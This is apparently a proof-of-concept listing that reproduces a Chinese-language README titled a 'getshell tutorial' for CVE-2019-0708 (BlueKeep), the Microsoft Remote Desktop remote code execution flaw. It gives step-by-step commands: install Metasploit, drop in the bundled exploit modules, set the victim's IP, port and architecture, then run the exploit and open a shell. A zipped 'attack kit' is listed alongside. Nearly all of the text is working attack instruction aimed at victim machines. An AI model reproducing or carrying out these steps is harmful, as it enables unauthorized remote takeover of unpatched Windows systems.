CVE-2019-0708 PoC — Microsoft Remote Desktop Services 资源管理错误漏洞

Source

Associated Vulnerability

Description

CVE-2019-0708 RCE远程代码执行getshell教程

Readme

# CVE-2019-0708-RCE
kali安装更新 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \  chmod 755 msfinstall && \  ./msfinstall


下载攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)


rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb


利用过程：

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce


使用set RHOSTS 受害机IP设置受害机IP

使用set RPORT 受害机PORT设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置受害机机器架构



set target=3

exploit

shell

![image](https://github.com/mai-lang-chai/CVE-2019-0708-RCE/blob/master/pic/1.png)

File Snapshot

 [4.0K]  /data/pocs/db9ac15753c35be615b30caff00554db0f82dcca
├── [ 30K]  CVE-2019-0708RDPMSF攻击套件.zip
├── [4.0K]  pic
│   ├── [   2]  1
│   └── [1.2M]  1.png
└── [1.2K]  README.md

1 directory, 4 files

Remarks